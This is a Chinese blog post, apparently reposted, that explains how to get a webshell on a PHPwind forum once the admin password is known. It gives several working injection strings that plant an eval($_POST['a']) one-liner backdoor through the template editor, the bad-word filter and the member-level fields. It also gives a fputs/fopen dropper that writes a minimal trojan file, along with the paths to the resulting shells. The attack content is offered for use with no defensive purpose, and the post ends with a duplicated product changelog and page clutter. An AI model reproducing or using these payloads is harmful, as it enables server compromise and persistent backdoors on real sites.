PHPwind后台获取Webshell

发现的一个phpwind漏洞搞的热闹非凡,该漏洞是因为message.php 文件的几个变量未进行过滤造成的。官方已发布补丁,所以我在这里摘一点关于取得管理密码后怎么拿webshell的方法:
方式1 模板法 
进入后台, 风格模版设置 ,在随便一行写代码
记住,这代码必须顶着左边行写,代码前面不可以有任何字符。
EOT;
eval($a);
print <<<EOT
例如,我写完某一行为。
.headurl { color:#ffffff;}
EOT;
eval($_POST['a']);
print <<<EOT
.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}

而后得到一个shell
http://localhost/bbs/index.php
(由于写到css里,也许有的操作无法返回,但是只要没有什么问题,一般操作都是可以接受的)
密码是a lanker的一句话后门。

方始2 脏话过滤法

进入 安全管理 ◇ 不良词语过滤

新增 
不良词语写 a']='aa';eval($_POST['a']);//
替换为那里可以随意

而后得到一个shell地址为 
http://localhost/bbs/data/bbscache/wordsfb.php

密码是a lanker的一句话后门。
方式3 用户等级管理
然后新建立会员组
头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a';eval($_POST['a']);//
升级点数依然可以随意写。
而后得到一个shell地址为 
http://localhost/bbs/data/bbscache/level.php
密码是a lanker的一句话后门。
这里提供的方式随便你选一种都可以得到shell。。。
方式三请按说明仔细操作,否则会导致论坛无法正常运行,后果,自负。
可我一一试过,没能拿到SHELL.

三种方法

1:后台添加个 asa 上传
2:<?fputs(fopen("./a.php","w"),"<?eval(/$_POST[a]);?>")?>然后看图修改包含银行查件文件名
bank.php为上传的phpshell的相对路径,访问url://hack.php?H_name=bank,就会在论坛根目录生成一
个a.php的最小马。

3:不用上传就是在词语替换那<?fputs(fopen("./a.php","w"),"<?eval(/$_POST[a]);?>")?>插入,然后
备份wordsfb字段记下相对路径。
-----------------------------------------------------------------
phpwind后台获得shell(貌似很管用)
如果是winnt系统直接添加一个.asa后缀的文件,(dz可以直接传asa)在后台找到文件上传的后的文件名,
论坛发个phpshell,<?fputs(fopen("./a.php","w"),"<?eval(/$_POST[a]);?>")?>
然后看图修改包含银行查件文件名bank.php为上传的phpshell的相对路径,
访问url://hack.php?H_name=bank,就
会在论坛根目录生成一个a.php的最小马。
还有不用上传就是在词语替换那<?fputs(fopen("./a.php","w"),"<?eval(/$_POST[a]);?>")?>插入,
然后备份wordsfb字段记下相对路径 http://www.98exe.cn南域安全网 windows最新漏洞,网络技术!·#¥%%……  
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHPWindForumsv7.3是一套采用PHP+MySQL方式运行的开源软件程序,可以帮助您轻松搭建并管理论坛。 PHPWindForumsv7.3利用了SNS的特性结合现有的论坛模式,打造了全新的“圈子模式”。 什么是圈子模式? 这是一个以论坛体系为基础的应用,在传统行为的论坛系统中,融入了更多可自定义的交互规则,众多的智能交互构成了全新的用户体验和应用流程,让客户的被动寻找转变为主动获取,进而加快信息流通、加强信息价值,但,她仍然是您与您的用户所熟知的论坛系统。 PHPWind7终极版完善、修正及增加功能部分列表: 新增功能: 1.投票增加前置条件 2.会员评分设置细化 3.增加导航通栏公告位,增加频道页面广告控制 4.版主已阅增加设置主题分类的后续操作 5.更改默认编辑器为所见即所得 6.改进静态页的生成 7.整合当开启圈子模式时u页面和个人空间页面 8.圈子中的“朋友”增“我的访客”模块 9.查找朋友页面增加“可能认识” 10.版块logo上传功能 11.改进圈子模式下随便看看的页面布局 12.增加“帖子分享” 13.分享操作增加后续“推荐”的功能 14.改善“圈子”中相册的易用性 15.群组列表中增加“已加入该群的”提示,并显示退出链接 16.增加各个文字输入框输入字数动态提示 17.默认风格增加开关 18.圈子中头像尺寸控制优化 19.系统头像改为直接在页面中列表显示 20.好友列表时间改为好友最近登录时间 21.分类名称和群组名称分开 22.未登录状态圈子首页导航选中,并且连接改为?m=o 23.增加头像字段长度 24.圈子中好友搜索形式改进 25.动态和分享中用户头像和群组加上超链接 26.改进浏览和发帖弹出框的弹出位置和样式 27.改进版块收藏的各个细节,并增加删除功能 28.圈子中添加日志app 29.圈子好友列表分页 30.后台热榜缓存更新改进 31.群组讨论区帖子删除编辑操作 32.图片的水印改进 33.增加更具发帖量限制发带有链接地址的帖子 34.增加我的主题按发帖时间和回复时间排序 35.改进积分管理-充值描述不清楚导致理解歧义 36.改进社区模式下的页面布局
PHPWindForumsv7.3是一套采用PHP+MySQL方式运行的开源软件程序,可以帮助您轻松搭建并管理论坛。 PHPWindForumsv7.3利用了SNS的特性结合现有的论坛模式,打造了全新的“圈子模式”。 什么是圈子模式? 这是一个以论坛体系为基础的应用,在传统行为的论坛系统中,融入了更多可自定义的交互规则,众多的智能交互构成了全新的用户体验和应用流程,让客户的被动寻找转变为主动获取,进而加快信息流通、加强信息价值,但,她仍然是您与您的用户所熟知的论坛系统。 PHPWind7终极版完善、修正及增加功能部分列表: 新增功能: 1.投票增加前置条件 2.会员评分设置细化 3.增加导航通栏公告位,增加频道页面广告控制 4.版主已阅增加设置主题分类的后续操作 5.更改默认编辑器为所见即所得 6.改进静态页的生成 7.整合当开启圈子模式时u页面和个人空间页面 8.圈子中的“朋友”增“我的访客”模块 9.查找朋友页面增加“可能认识” 10.版块logo上传功能 11.改进圈子模式下随便看看的页面布局 12.增加“帖子分享” 13.分享操作增加后续“推荐”的功能 14.改善“圈子”中相册的易用性 15.群组列表中增加“已加入该群的”提示,并显示退出链接 16.增加各个文字输入框输入字数动态提示 17.默认风格增加开关 18.圈子中头像尺寸控制优化 19.系统头像改为直接在页面中列表显示 20.好友列表时间改为好友最近登录时间 21.分类名称和群组名称分开 22.未登录状态圈子首页导航选中,并且连接改为?m=o 23.增加头像字段长度 24.圈子中好友搜索形式改进 25.动态和分享中用户头像和群组加上超链接 26.改进浏览和发帖弹出框的弹出位置和样式 27.改进版块收藏的各个细节,并增加删除功能 28.圈子中添加日志app 29.圈子好友列表分页 30.后台热榜缓存更新改进 31.群组讨论区帖子删除编辑操作 32.图片的水印改进 33.增加更具发帖量限制发带有链接地址的帖子 34.增加我的主题按发帖时间和回复时间排序 35.改进积分管理-充值描述不清楚导致理解歧义 36.改进社区模式下的页面布局

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值